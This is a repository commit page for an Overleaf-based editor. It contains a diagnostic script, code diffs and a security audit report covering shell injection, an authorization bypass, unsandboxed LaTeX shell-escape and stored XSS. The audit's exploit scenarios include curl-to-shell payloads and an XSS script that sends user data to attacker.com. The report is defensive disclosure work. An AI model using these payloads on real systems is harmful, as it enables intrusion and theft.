11 Commits

Author SHA1 Message Date
claude 952c897760 docs: add alpha-3 security audit report
Four findings: shell injection via filename (RCE on CLSI), auth bypass
on publish-presentation routes, shell-escape without sandbox in prod,
and stored XSS via published presentations (CSP removed on main origin).

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-06-19 10:10:19 +00:00
alois 713aa70c52 Update issues3.png 2026-06-09 07:25:39 +00:00
alois 3e0188b66d Upload files to "/" 2026-06-09 07:25:13 +00:00
claude 8c9a610f0d tools: add Typst bold/italic parse-tree diagnostic script
Paste typst-bold-italic-diag.js into the browser console while a Typst
document containing *bold* and _italic_ is open to determine whether
Strong/Emphasis nodes are being produced by the grammar (grammar issue)
or whether the nodes exist but bold/italic is not visually rendered
(font issue — Source Code Pro only loads Regular 400).

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-06-08 22:02:14 +00:00
alois 6496e9133d Update issues2.png 2026-06-08 21:22:11 +00:00
alois 5fcf4bb262 Upload files to "/" 2026-06-08 21:21:48 +00:00
alois 8e6e9eded0 Update issues.png 2026-06-08 20:45:03 +00:00
alois 33c830b594 Upload files to "issue.png" 2026-06-08 20:44:27 +00:00
claude f36dbd12e9 chore: rewrite diagnostic — CSS class counts + cm-content view accessor 2026-06-08 19:35:02 +00:00
claude c65bb80512 chore: fix CodeMirror view accessor in diagnostic script 2026-06-08 19:29:49 +00:00
claude 031f65224c chore: add browser diagnostic script for Typst highlighting 2026-06-08 19:29:49 +00:00
38 changed files with 532 additions and 648 deletions
+43
@@ -0,0 +1,43 @@
/**
* Typst syntax highlighting diagnostics.
* Paste into browser dev tools console with a Typst file open.
*/
// ── Part 1: CSS token counts (no view needed) ────────────────────────────
// If all are 0, the language mode is not being applied at all.
console.log('=== Token CSS class counts ===')
;['heading','comment','keyword','string','number',
'variableName','function','emphasis','strong'].forEach(t => {
const n = document.querySelectorAll('.tok-' + t).length
console.log(` .tok-${t}: ${n}`)
})
// ── Part 2: Try to get the parse tree ────────────────────────────────────
// CodeMirror 6 stores DocView on .cm-content; DocView.view = EditorView
const content = document.querySelector('.cm-content')
const view = content?.cmView?.view
if (!view?.state) {
console.warn('Could not find EditorView — parse tree unavailable')
console.log('Keys on .cm-content:', Object.keys(content ?? {}).join(', '))
} else {
console.log('\n=== Parse tree (top 600 chars) ===')
console.log(view.state.tree.toString().slice(0, 600))
// First heading line
const doc = view.state.doc
for (let ln = 1; ln <= Math.min(doc.lines, 25); ln++) {
const line = doc.line(ln)
if (line.text.trimStart().startsWith('=')) {
console.log(`\n=== Nodes on heading line ${ln}: "${line.text}" ===`)
view.state.tree.iterate({
from: line.from, to: line.to,
enter(node) {
const t = doc.sliceString(node.from, node.to)
console.log(` ${node.name}: ${JSON.stringify(t.slice(0, 50))}`)
}
})
break
}
}
}
+259
@@ -0,0 +1,259 @@
# Verso Alpha-3 Security Audit
**Date:** 2026-06-19
**Branch audited:** `main` (full codebase)
**Method:** multi-agent automated review + manual false-positive filtering
---
## Summary
| # | Title | Severity | Confidence |
|---|-------|----------|------------|
| 1 | Shell injection via filename → RCE on CLSI | **HIGH** | 9/10 |
| 2 | Read-only collaborator can publish / unpublish / rotate tokens | **HIGH** | 9/10 |
| 3 | LaTeX `shell-escape` enabled without sandbox in production | **HIGH** | 9/10 |
| 4 | Published presentations served without CSP (stored XSS on origin) | **MEDIUM** | 9/10 |
---
## Vuln 1 — Command Injection via Filename → RCE on CLSI
**Files:**
- `services/clsi/app/js/QuartoRunner.js` (lines 102–147)
- `services/clsi/app/js/TypstRunner.js` (lines 139–141, 399–400)
**Category:** `command_injection` / `rce`
**Severity:** HIGH | **Confidence:** 9/10
### Description
`renderTarget` / `mainFile` (the project's root resource path) is interpolated directly into a shell command string passed to `/bin/sh -c` without any quoting or escaping:
```js
// QuartoRunner.js ~line 102
const baseName = renderTarget.replace(/\.[^/.]+$/, '')
// …passed to /bin/sh -c:
`quarto render $COMPILE_DIR/${renderTarget} 2>&1 && mv ${baseName}.pdf output.pdf`
`; rm -rf ${baseName}.qmd ${baseName}_files`
```
```js
// TypstRunner.js ~line 140 — double quotes do NOT prevent $() or backtick expansion
['/bin/sh', '-c', `typst watch "${absInput}" "${absOutput}" 2>&1`]
// TypstRunner.js ~line 399 — completely unquoted
['/bin/sh', '-c', `typst compile $COMPILE_DIR/${mainFile} output.pdf 2>&1`]
```
`SafePath.isCleanFilename()` (`SafePath.mjs` lines 24–37) only blocks `/`, `\`, `*`, and control characters. Shell metacharacters — `$`, `` ` ``, `(`, `)`, `;`, `&`, `|` — all pass through unchecked. The CLSI's own `_checkPath()` only rejects `..` path traversal.
### Exploit Scenario
Any project collaborator renames their root file to:
```
foo$(curl https://attacker.com/shell.sh|sh).qmd
```
Triggering a compile executes the injected command unsandboxed inside the CLSI container as the host process user.
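To make the interpolation concrete, here is a minimal sketch that only builds the command string and never executes it. The template is copied from the `QuartoRunner.js` excerpt above; the function name `buildQuartoCommand` and the harmless stand-in payload `$(id)` are assumptions for illustration.

```js
// Illustration only: this builds the string that would reach `/bin/sh -c`.
// Nothing is executed. `buildQuartoCommand` is a hypothetical name.
function buildQuartoCommand(renderTarget) {
  // Same extension-stripping regex as the QuartoRunner.js excerpt.
  const baseName = renderTarget.replace(/\.[^/.]+$/, '')
  return `quarto render $COMPILE_DIR/${renderTarget} 2>&1 && mv ${baseName}.pdf output.pdf`
}

// A filename carrying a command substitution survives untouched.
const cmd = buildQuartoCommand('foo$(id).qmd')
console.log(cmd)
```

The `$(id)` substitution appears twice in the resulting string, once via `renderTarget` and once via `baseName`, so a shell would evaluate it in both places.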
### Fix
Use an args array instead of `/bin/sh -c` with a concatenated string:
```js
// Instead of:
spawn('/bin/sh', ['-c', `quarto render ${renderTarget} ...`])
// Use:
spawn('quarto', ['render', absRenderTarget, '--to', 'pdf'])
```
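For cases where a shell string is unavoidable, wrap the variable in single quotes and escape every embedded single quote as `'\''`. Plain `'${renderTarget}'` alone is not enough, because a filename containing `'` closes the quoting and `isCleanFilename()` does not reject that character. The safest fix is removing all three `/bin/sh -c templateString` invocations in favour of direct `spawn` with an explicit args array.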
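If a shell string really cannot be avoided, the quoting has to handle single quotes inside the value as well. The following is a minimal sketch of POSIX single-quote escaping; `shellQuote` is a hypothetical helper, not something that exists in the audited codebase.

```js
// Hypothetical helper (not part of the codebase): POSIX single-quote escaping.
// Inside single quotes the shell expands nothing, so the only character that
// needs care is the single quote itself: close the quote, emit \', reopen.
function shellQuote(value) {
  return "'" + String(value).replace(/'/g, "'\\''") + "'"
}

// Filenames with command substitution and with an embedded quote.
console.log(shellQuote('foo$(id).qmd'))
console.log(shellQuote("it's.qmd"))
```

Even with such a helper, every call site has to remember to use it, which is why the args-array form of `spawn` remains the more robust option.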
---
## Vuln 2 — Authorization Bypass: Read-Only Collaborators Can Publish / Unpublish / Rotate Tokens
**File:** `services/web/app/src/router.mjs` (lines 697–710)
**Category:** `authorization_bypass` / `privilege_escalation`
**Severity:** HIGH | **Confidence:** 9/10
### Description
Three destructive presentation endpoints are gated on `ensureUserCanReadProject` instead of `ensureUserCanAdminProject`:
```js
webRouter.post('/project/:Project_id/publish-presentation',
AuthorizationMiddleware.ensureUserCanReadProject, // ← should be ensureUserCanAdminProject
PublishedPresentationController.publish)
webRouter.post('/project/:Project_id/publish-presentation/regenerate',
AuthorizationMiddleware.ensureUserCanReadProject, // ← should be ensureUserCanAdminProject
PublishedPresentationController.regenerate)
webRouter.delete('/project/:Project_id/publish-presentation',
AuthorizationMiddleware.ensureUserCanReadProject, // ← should be ensureUserCanAdminProject
PublishedPresentationController.unpublish)
```
`canUserReadProject` returns `true` for the `READ_ONLY` privilege level (`AuthorizationManager.mjs` lines 260–276), which is granted to any read-only collaborator and to anonymous users holding a read-only token link. `canUserAdminProject` requires `OWNER` only.
### Exploit Scenario
User A shares a project read-only with User B. User B can:
1. **`DELETE /publish-presentation`** — permanently take down the owner's published presentation
2. **`POST /publish-presentation/regenerate`** — rotate the public/login/member share token, breaking all existing links
3. **`POST /publish-presentation`** — force a recompile and overwrite the published snapshot
### Fix
```js
// Change all three routes — replace:
AuthorizationMiddleware.ensureUserCanReadProject
// with:
AuthorizationMiddleware.ensureUserCanAdminProject
```
One-line fix per route. This is the highest-priority fix because it requires no architectural change.
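The gap between the two gates can be modelled in a few lines. This is a simplified sketch of the behaviour described above, not the real `AuthorizationManager`; the constant values and function names are stand-ins chosen for illustration.

```js
// Stand-in model of the two gates; names and values are illustrative only.
const PrivilegeLevels = Object.freeze({
  NONE: 'none',
  READ_ONLY: 'readOnly',
  READ_AND_WRITE: 'readAndWrite',
  OWNER: 'owner',
})

// Read gate: any level that grants at least read access passes.
const canRead = level =>
  [PrivilegeLevels.READ_ONLY, PrivilegeLevels.READ_AND_WRITE, PrivilegeLevels.OWNER].includes(level)

// Admin gate: only the owner passes.
const canAdmin = level => level === PrivilegeLevels.OWNER

// Report which gate each privilege level clears.
function gateReport(level) {
  return { level, passesReadGate: canRead(level), passesAdminGate: canAdmin(level) }
}

for (const level of Object.values(PrivilegeLevels)) {
  console.log(gateReport(level))
}
```

Under this model, `readOnly` and `readAndWrite` clear the read gate but not the admin gate, which is exactly the set of users the three routes currently let through.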
---
## Vuln 3 — LaTeX `shell-escape` Enabled Without Sandbox in Production (RCE)
**Files:**
- `.gitea/workflows/deploy-verso-prod.yml` (lines 332–333)
- `services/clsi/app/js/LatexRunner.js` (lines 200–202)
- `services/clsi/app/js/CommandRunner.js` (lines 12–16)
**Category:** `rce` / `insecure_configuration`
**Severity:** HIGH | **Confidence:** 9/10
### Description
The production Kubernetes deployment sets `OVERLEAF_LATEX_SHELL_ESCAPE: "true"` with neither `SANDBOXED_COMPILES` nor `DOCKER_RUNNER` configured. This passes `-shell-escape` to every latexmk invocation globally, for all users, with no per-user or per-project gating:
```js
// LatexRunner.js lines 200–202
if (Settings.clsi?.latexShellEscape) {
command.push('-shell-escape') // unconditional — applies to all users/projects
}
```
Without `DOCKER_RUNNER=true`, `CommandRunner.js` selects `LocalCommandRunner` — compiles run as the host process with full container filesystem access. The reference `docker-compose.yml` *does* configure sandboxed compiles (`SANDBOXED_COMPILES: true`, `DOCKER_RUNNER: true`); the production K8s deployment simply omits them.
The compile endpoint requires only `ensureUserCanReadProject`, so any holder of a read-only share link can trigger a compile.
### Exploit Scenario
Any user with read-only access to any project uploads or edits a `.tex` file containing:
```latex
\immediate\write18{curl https://attacker.com/shell.sh | bash}
```
Triggering a compile executes the command unsandboxed, with access to all mounted volumes (source files, Redis socket, compile output).
### Fix (two steps)
**Step 1 — Short term:** Remove `OVERLEAF_LATEX_SHELL_ESCAPE: "true"` from `.gitea/workflows/deploy-verso-prod.yml`. Disable shell-escape entirely unless there is a specific, per-project need.
**Step 2 — Medium term:** Add sandboxed compile configuration to the production deployment, mirroring the reference `docker-compose.yml`:
```yaml
- name: SANDBOXED_COMPILES
value: "true"
- name: DOCKER_RUNNER
value: "true"
```
This contains the blast radius of any future compile-path vulnerability regardless of shell-escape status.
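One way to keep this misconfiguration from recurring is a startup check that refuses the unsafe combination. The sketch below is an assumption about how such a guard could look: the environment variable names come from this report, while `assertSafeCompileConfig` and its error text are hypothetical.

```js
// Hypothetical startup guard (not part of the codebase). It rejects the
// combination flagged above: shell-escape on while sandboxing is off.
function assertSafeCompileConfig(env) {
  // Treat only the literal string "true" (any case) as enabled.
  const isTrue = value => String(value).toLowerCase() === 'true'
  const shellEscape = isTrue(env.OVERLEAF_LATEX_SHELL_ESCAPE)
  const sandboxed = isTrue(env.SANDBOXED_COMPILES) && isTrue(env.DOCKER_RUNNER)
  if (shellEscape && !sandboxed) {
    throw new Error('shell-escape requires SANDBOXED_COMPILES and DOCKER_RUNNER to be "true"')
  }
  return { shellEscape, sandboxed }
}

// Example: the reference docker-compose style configuration passes.
console.log(assertSafeCompileConfig({
  OVERLEAF_LATEX_SHELL_ESCAPE: 'true',
  SANDBOXED_COMPILES: 'true',
  DOCKER_RUNNER: 'true',
}))
```

Called with `process.env` at service start, a check like this would turn the current production settings into a boot failure rather than a silent exposure.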
---
## Vuln 4 — Stored XSS via Published Presentations (CSP Removed on Main Origin)
**File:** `services/web/app/src/Features/PublishedPresentation/PublishedPresentationController.mjs` (line 116)
**Category:** `xss` / `stored`
**Severity:** MEDIUM | **Confidence:** 9/10
### Description
The published-presentation handler explicitly removes the Content-Security-Policy header before serving the raw HTML output:
```js
res.removeHeader('Content-Security-Policy') // line 116
res.sendFile(target, ...) // serves output.html / index.html directly
```
The file served is the raw Quarto/reveal.js compile output — not a sanitized template. Since users control the `.qmd` source entirely, arbitrary `<script>` blocks can be embedded. The `/p/:token` routes are registered on the same `webRouter` as the main app, so scripts execute with **full same-origin privileges** against the Verso application origin.
### Impact
- Any visitor to a `publicToken` link has the script execute in their browser (no login required to be targeted)
- `fetch()` calls from the same origin automatically include the session cookie; `httpOnly` only stops scripts from reading the cookie, not from sending authenticated requests
- A script can call the `/dev/csrf` endpoint to obtain a valid CSRF token, then call any mutating POST/DELETE API endpoint as the victim (read/write projects, change email, delete account, exfiltrate documents)
### Exploit Scenario
1. Attacker creates a Quarto project with a slide containing:
```html
<script>
fetch('/user/settings', {credentials: 'include'})
.then(r => r.json())
.then(d => fetch('https://attacker.com/?d=' + btoa(JSON.stringify(d))))
</script>
```
2. Compiles and publishes → obtains the `publicToken` URL
3. Shares the link with a victim
4. Victim visits the link → script executes on the Verso origin → authenticated API calls made on victim's behalf
### Fix
The correct fix is to **serve published presentations from an isolated subdomain** (e.g., `decks.verso.example.com`) with no session cookie access, so embedded scripts are origin-isolated from the main app.
As a stopgap, apply a restricted CSP instead of removing it entirely:
```js
// Instead of:
res.removeHeader('Content-Security-Policy')
// Apply a presentation-specific policy:
res.setHeader('Content-Security-Policy',
"default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; connect-src 'none'")
```
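`connect-src 'none'` blocks `fetch()`/XHR calls, including same-origin API requests, even if inline scripts run. It does not restrict navigations or form submissions, so it is a partial mitigation only.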
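A long policy string is easy to mistype, so it can help to assemble it from a directive map. The sketch below reproduces the stopgap policy from this section; `buildCsp` is a hypothetical helper, not an existing function in the codebase.

```js
// Hypothetical helper: serialise a directive map into a CSP header value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(' ')}`)
    .join('; ')
}

// The presentation-specific stopgap policy proposed above.
const presentationCsp = buildCsp({
  'default-src': ["'self'"],
  'script-src': ["'self'", "'unsafe-inline'"],
  'style-src': ["'self'", "'unsafe-inline'"],
  'connect-src': ["'none'"],
})

console.log(presentationCsp)
```

The result could then be passed to `res.setHeader('Content-Security-Policy', presentationCsp)` in place of the `removeHeader` call.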
---
## Items Reviewed and Not Flagged
| Area | Finding |
|------|---------|
| MongoDB queries | No raw `req.body` interpolation; Mongoose used throughout |
| CSRF protection | `csurf` middleware applied globally; no Verso-added bypass found |
| `dangerouslySetInnerHTML` | Only in operator-controlled footer (env-var source, not user input) |
| `DOMPurify` usage | `labs-description.tsx` uses it correctly with a strict allowlist |
| Hardcoded credentials | `dev.env` has weak defaults; production uses auto-generated secrets from `100_generate_secrets.sh` |
| Open redirects | `getSafeRedirectPath` strips to pathname only; no exploitable chain found |
| SSRF (URL agent) | Proxied through `linkedUrlProxy`; host allowlisting in place |
| Path traversal in `serve()` | `path.resolve` + `startsWith` guard is correct |
| Session secret | Auto-generated at init, stored in `/etc/container_environment/CRYPTO_RANDOM` |
---
## Recommended Fix Priority for Alpha-3
| Priority | Finding | Effort |
|----------|---------|--------|
| 1 | **Vuln 2** — wrong auth middleware on 3 routes | ~5 min, 3-line fix |
| 2 | **Vuln 3** — remove `shell-escape` from prod deploy | ~5 min, remove 2 lines from YAML |
| 3 | **Vuln 1** — fix quoting in QuartoRunner + TypstRunner | ~1 hour, refactor spawn calls |
| 4 | **Vuln 4** — XSS via presentations | Hours to days; subdomain isolation is the real fix |
Vulns 1–3 are straightforward enough to fix before shipping alpha-3. Vuln 4 can be mitigated with the `connect-src 'none'` CSP header as a stopgap and tracked as a post-alpha-3 architectural item.
BIN
Binary file not shown (image, 88 KiB).

BIN
Binary file not shown (image, 95 KiB).

BIN
Binary file not shown (image, 102 KiB).

+3 -2
@@ -26,12 +26,13 @@ cypress/results/
# Ace themes for conversion
frontend/js/features/source-editor/themes/ace/
# Compiled parser files (latex/bibtex are generated by webpack plugin at build time)
# Compiled parser files
frontend/js/features/source-editor/lezer-latex/latex.mjs
frontend/js/features/source-editor/lezer-latex/latex.terms.mjs
frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs
frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs
# typst compiled files are committed (generated via node scripts/lezer-latex/generate.mjs)
frontend/js/features/source-editor/lezer-typst/typst.mjs
frontend/js/features/source-editor/lezer-typst/typst.terms.mjs
!**/fixtures/**/*.log
@@ -1,7 +1,6 @@
import { pipeline } from 'node:stream/promises'
import Metrics from '@overleaf/metrics'
import ProjectGetter from '../Project/ProjectGetter.mjs'
import { Project } from '../../models/Project.mjs'
import CompileManager from './CompileManager.mjs'
import ClsiManager from './ClsiManager.mjs'
import logger from '@overleaf/logger'
@@ -9,7 +8,6 @@ import Settings from '@overleaf/settings'
import Errors from '../Errors/Errors.js'
import SessionManager from '../Authentication/SessionManager.mjs'
import { userCanInstallPython } from './PythonVenvGate.mjs'
import TokenAccessHandler from '../TokenAccess/TokenAccessHandler.mjs'
import { RateLimiter } from '../../infrastructure/RateLimiter.mjs'
import Validation from '../../infrastructure/Validation.mjs'
import Path from 'node:path'
@@ -207,8 +205,7 @@ const _CompileController = {
// Allow building a per-project Python venv from requirements.txt only for
// the project owner and invited collaborators — never anonymous or
// link-sharing users.
const anonToken = TokenAccessHandler.getRequestToken(req, projectId)
options.allowPythonInstall = await userCanInstallPython(userId, projectId, anonToken)
options.allowPythonInstall = await userCanInstallPython(userId, projectId)
let {
enablePdfCaching,
@@ -303,26 +300,6 @@ const _CompileController = {
? getOutputFilesArchiveSpecification(projectId, userId, buildId)
: null
// Persist quarto output flavor so the project-list badge can distinguish
// RevealJS presentations from PDF documents without needing a compile.
// options.compiler is not sent by the frontend, so we read the stored
// compiler from the DB. Done fire-and-forget so it never delays the response.
if (status === 'success') {
const isHtml = outputFiles.some(f => f.path === 'output.html')
ProjectGetter.promises
.getProject(projectId, { compiler: 1 })
.then(project => {
if (project?.compiler !== 'quarto') return
return Project.updateOne(
{ _id: projectId },
{ quartoFlavor: isHtml ? 'revealjs' : 'pdf' }
).exec()
})
.catch(err =>
logger.warn({ err, projectId }, 'failed to update quartoFlavor')
)
}
res.json({
status,
outputFiles,
@@ -4,12 +4,11 @@ import AuthorizationManager from '../Authorization/AuthorizationManager.mjs'
// Whether this user may have the compiler install a project's requirements.txt
// into a cached venv (so Quarto's Python cells can use libraries beyond the
// bundled base set). Allowed for any user who can access the project: owner,
// invited collaborators, token-link users, and public-project readers — since
// the set of packages to install is already controlled by requirements.vrf
// (writable only by project members with write access). Returns false when the
// feature is disabled, the privilege check fails, or the user has no access.
export async function userCanInstallPython(userId, projectId, token = null) {
// bundled base set). Gated to the project owner + invited collaborators (any
// role): ignorePublicAccess excludes link-sharing/public and anonymous users,
// who fall back to the base Python interpreter. Returns false when the feature
// is disabled or the privilege check fails.
export async function userCanInstallPython(userId, projectId) {
if (!Settings.enableProjectPythonVenv) {
return false
}
@@ -18,7 +17,8 @@ export async function userCanInstallPython(userId, projectId, token = null) {
await AuthorizationManager.promises.getPrivilegeLevelForProject(
userId,
projectId,
token
null,
{ ignorePublicAccess: true }
)
return Boolean(privilegeLevel)
} catch (err) {
@@ -681,7 +681,7 @@ async function _getProjects(
const results = await Promise.all([
ProjectGetter.promises.findAllUsersProjects(
userId,
'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens compiler quartoFlavor'
'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens compiler'
),
TagsHandler.promises.getAllTags(userId),
])
@@ -826,7 +826,6 @@ function _formatProjectInfo(project, accessLevel, source, userId) {
archived,
trashed,
compiler: project.compiler,
quartoFlavor: project.quartoFlavor,
}
}
@@ -881,7 +880,6 @@ async function _injectProjectUsers(projects) {
: users[project.owner_ref.toString()],
owner_ref: undefined,
compiler: project.compiler,
quartoFlavor: project.quartoFlavor,
}))
}
-1
@@ -38,7 +38,6 @@ export const ProjectSchema = new Schema(
version: { type: Number }, // incremented for every change in the project structure (folders and filenames)
publicAccesLevel: { type: String, default: 'private' },
compiler: { type: String, default: settings.defaultLatexCompiler },
quartoFlavor: { type: String, enum: ['revealjs', 'pdf'] },
spellCheckLanguage: { type: String, default: 'en' },
deletedByExternalDataSource: { type: Boolean, default: false },
description: { type: String, default: '' },
@@ -8,7 +8,6 @@ import { usePermissionsContext } from '@/features/ide-react/context/permissions-
import FileTreeActionButton from './file-tree-action-button'
import { useRailContext } from '../../ide-react/context/rail-context'
import PythonRequirementsModal from './python-requirements-modal'
import { useProjectSettingsContext } from '@/features/editor-left-menu/context/project-settings-context'
export default function FileTreeActionButtons({
fileTreeExpanded,
@@ -20,8 +19,6 @@ export default function FileTreeActionButtons({
const { write } = usePermissionsContext()
const { handlePaneCollapse } = useRailContext()
const [showPythonModal, setShowPythonModal] = useState(false)
const { compiler } = useProjectSettingsContext()
const isQuarto = compiler === 'quarto'
const {
canCreate,
@@ -115,7 +112,7 @@ export default function FileTreeActionButtons({
iconType="delete"
/>
)}
{write && isQuarto && (
{write && (
<FileTreeActionButton
id="python-packages"
description={t('python_packages')}
@@ -4,21 +4,12 @@ import { ProjectCompiler } from '../../../../../../../types/project-settings'
// Map the stored compiler engine to the document format the project produces.
// CLSI dispatches the real engine from the root file's extension, but the
// compiler field is a faithful, cheap proxy for the project's format.
function formatLabel(
compiler: ProjectCompiler | undefined,
quartoFlavor: 'revealjs' | 'pdf' | undefined
): {
function formatLabel(compiler: ProjectCompiler | undefined): {
label: string
variant: 'quarto-slides' | 'quarto' | 'typst' | 'latex'
variant: 'quarto' | 'typst' | 'latex'
} {
switch (compiler) {
case 'quarto':
if (quartoFlavor === 'revealjs') {
return { label: 'Quarto Slides', variant: 'quarto-slides' }
}
if (quartoFlavor === 'pdf') {
return { label: 'Quarto PDF', variant: 'quarto' }
}
return { label: 'Quarto', variant: 'quarto' }
case 'typst':
return { label: 'Typst', variant: 'typst' }
@@ -33,7 +24,7 @@ type FormatCellProps = {
}
export default function FormatCell({ project }: FormatCellProps) {
const { label, variant } = formatLabel(project.compiler, project.quartoFlavor)
const { label, variant } = formatLabel(project.compiler)
return (
<span
@@ -46,6 +46,5 @@ export const classHighlighter = tagHighlighter([
{ tag: tags.invalid, class: 'tok-invalid' },
{ tag: tags.punctuation, class: 'tok-punctuation' },
// additional
{ tag: tags.attributeName, class: 'tok-attributeName' },
{ tag: tags.attributeValue, class: 'tok-attributeValue' },
])
@@ -203,9 +203,6 @@ const staticTheme = EditorView.theme({
alignItems: 'center',
fontWeight: 'normal',
},
// Bold and italic markup (e.g. *strong* _emphasis_ in Typst and Markdown)
'.tok-strong': { fontWeight: 'bold' },
'.tok-emphasis': { fontStyle: 'italic' },
'.cm-selectionLayer': {
zIndex: -10,
},
@@ -23,53 +23,32 @@ const LEVELS: NestingLevel[] = [
// after it, so this stays clear of code.
const HEADING_REGEX = /^(=+)[ \t]+(.*\S)[ \t]*$/
// Count unescaped '$' signs on a line to track math-mode parity.
function countDollars(text: string): number {
let count = 0
for (let i = 0; i < text.length; i++) {
if (text[i] === '\\') { i++; continue }
if (text[i] === '$') count++
}
return count
}
function computeOutline(
state: EditorState
): ProjectionResult<FlatOutlineItem> {
const items: FlatOutlineItem[] = []
// Track whether we are inside a multi-line display math block.
// Each line with an odd number of unescaped '$' toggles the flag.
let inMath = false
for (let n = 1; n <= state.doc.lines; n++) {
const line = state.doc.line(n)
const text = line.text
const match = HEADING_REGEX.exec(line.text)
if (!match) continue
// Only attempt heading detection when not inside a math block.
// (e.g. '= b+c$' on the second line of '$ a \n= b+c$' must be skipped.)
if (!inMath) {
const match = HEADING_REGEX.exec(text)
if (match) {
const depth = match[1].length
const level = LEVELS[Math.min(depth, LEVELS.length) - 1]
// Strip a trailing line comment, then a trailing label.
const title = match[2]
.replace(/\s*\/\/.*$/, '')
.replace(/\s*<[\w-]+>\s*$/, '')
.trim()
const depth = match[1].length
const level = LEVELS[Math.min(depth, LEVELS.length) - 1]
// Strip a trailing line comment, then a trailing label.
const title = match[2]
.replace(/\s*\/\/.*$/, '')
.replace(/\s*<[\w-]+>\s*$/, '')
.trim()
items.push({
line: n,
toLine: n,
title,
from: line.from,
to: line.to,
level,
} as FlatOutlineItem)
}
}
if (countDollars(text) % 2 === 1) inMath = !inMath
items.push({
line: n,
toLine: n,
title,
from: line.from,
to: line.to,
level,
} as FlatOutlineItem)
}
return { items, status: ProjectionStatus.Complete }
@@ -14,8 +14,9 @@ import { typstDocumentOutline } from './document-outline'
// Note on tree structure: rules starting with a lowercase letter in the grammar
// are inline (no tree node), so their children are promoted to the parent.
// E.g. codeArgItem, codeValue, callSuffix, codeArgList are all inline.
// Named arg keys emit CodeArgKey (not CodeIdent) via codeIdentTokenizer,
// so CodeArgKey appears at the same level as other codeArgItem children.
// Therefore:
// - The named-argument key "CodeIdent" is a *direct* child of CodeArgs.
// - Positional arguments that are identifiers are wrapped in CallExpr.
export const TypstLanguage = LRLanguage.define({
name: 'typst',
@@ -49,13 +50,11 @@ export const TypstLanguage = LRLanguage.define({
CodeBool: t.atom,
// Identifiers:
// CodeExpr/CodeIdent — bare #func (no args) → function style
// FuncExpr/CodeIdent — func call with args/method (#func(...), link.with(url)) → function style
// CodeArgKey — named arg key (tokenizer pre-disambiguates on ':') → attributeName
// CodeIdent — plain variable/constant reference (e.g. 'left', 'center') → variable
'CodeExpr/CodeIdent': t.function(t.variableName),
'FuncExpr/CodeIdent': t.function(t.variableName),
CodeArgKey: t.attributeName,
// - direct child of CallExpr → function/method name
// - direct child of CodeArgs → named argument key (key: value syntax)
// - everywhere else → plain variable
'CallExpr/CodeIdent': t.function(t.variableName),
'CodeArgs/CodeIdent': t.attributeName,
CodeIdent: t.variableName,
// Literals in code mode
@@ -74,11 +73,8 @@ export const TypstLanguage = LRLanguage.define({
MathContent: t.string,
// Markup emphasis
'Strong/"*" Strong/StrongBody': t.strong,
'Emphasis/"_" Emphasis/EmphBody': t.emphasis,
// Bare URLs (https://... / http://...)
URL: t.string,
'Strong/"*" Strong/StrongText': t.strong,
'Emphasis/"_" Emphasis/EmphText': t.emphasis,
// Labels (<name>) and references (@name)
'Label/"<" Label/">" Label/LabelName': t.labelName,
@@ -101,9 +97,6 @@ const typstHighlightStyle = HighlightStyle.define([
{ tag: t.heading, fontWeight: 'bold' },
{ tag: t.strong, fontWeight: 'bold' },
{ tag: t.emphasis, fontStyle: 'italic' },
// Named arg keys (fill:, caption:, columns:…) — amber colour that reads
// well on both light and dark backgrounds, independent of theme CSS.
{ tag: t.attributeName, color: '#c47900' },
])
export const typst = () => {
@@ -8,50 +8,22 @@ import {
RawBlockBody,
RawBlockClose,
RawInlineContent,
CodeBlockBody,
BlockCommentBody,
LineCommentContent,
MathContent,
CodeKeyword,
CodeIdent,
CodeArgKey,
StrongBody,
EmphBody,
} from './typst.terms.mjs'
const BACKTICK = 96 // `
const SLASH = 47 // /
const STAR = 42 // *
const NEWLINE = 10 // \n
const EQUALS = 61 // =
const SPACE = 32 //
const TAB = 9 // \t
const DOLLAR = 36 // $
const BACKTICK = 96 // `
const SLASH = 47 // /
const STAR = 42 // *
const NEWLINE = 10 // \n
const EQUALS = 61 // =
const SPACE = 32 //
const TAB = 9 // \t
const DOLLAR = 36 // $
const OPEN_BRACE = 123 // {
const CLOSE_BRACE = 125 // }
const HASH = 35 // #
const UNDERSCORE = 95 // _
const DOT = 46 // .
const OPEN_PAREN = 40 // (
const COMMA = 44 // ,
const COLON = 58 // :
const SEMICOLON = 59 // ;
const OPEN_ANGLE = 60 // <
const CLOSE_ANGLE = 62 // >
const PLUS = 43 // +
const KEYWORDS = new Set([
'let', 'set', 'show', 'import', 'include',
'if', 'else', 'for', 'while', 'return',
'break', 'continue', 'in', 'as',
'and', 'or', 'not', 'context',
])
const BOOLS = new Set(['true', 'false', 'none', 'auto'])
const isAlpha = ch => (ch >= 65 && ch <= 90) || (ch >= 97 && ch <= 122)
const isDigit = ch => ch >= 48 && ch <= 57
const isIdentHead = ch => isAlpha(ch) || ch === UNDERSCORE
const isIdentTail = ch => isAlpha(ch) || isDigit(ch) || ch === UNDERSCORE || ch === 45
// ── headingTokenizer ────────────────────────────────────────────────────
// Emits HeadingMark — the "=+" prefix plus the trailing whitespace.
@@ -90,17 +62,6 @@ export const headingTitleTokenizer = new ExternalTokenizer(
while (input.next !== -1 && input.next !== NEWLINE) {
if (input.next === SLASH &&
(input.peek(1) === SLASH || input.peek(1) === STAR)) break
// Stop before a trailing '<label>' so it is parsed as a Label node
// rather than being merged into the heading title text.
// Only stops when '<' is immediately followed by a valid label name and '>'.
if (input.next === OPEN_ANGLE) {
const ch = input.peek(1)
if (isAlpha(ch) || isDigit(ch) || ch === UNDERSCORE) {
let j = 2
while (isIdentTail(input.peek(j)) || input.peek(j) === DOT || input.peek(j) === COLON) j++
if (input.peek(j) === CLOSE_ANGLE) break
}
}
input.advance()
hasContent = true
}
@@ -144,20 +105,6 @@ export const rawTokenizer = new ExternalTokenizer(
}
if (stack.canShift(RawBlockBody)) {
// Guard: must genuinely follow a RawBlockOpen (which ends with \n).
// Walk backward past any lang tag (A-Za-z0-9) and require ```.
// This blocks spurious LALR-merged states from consuming body text.
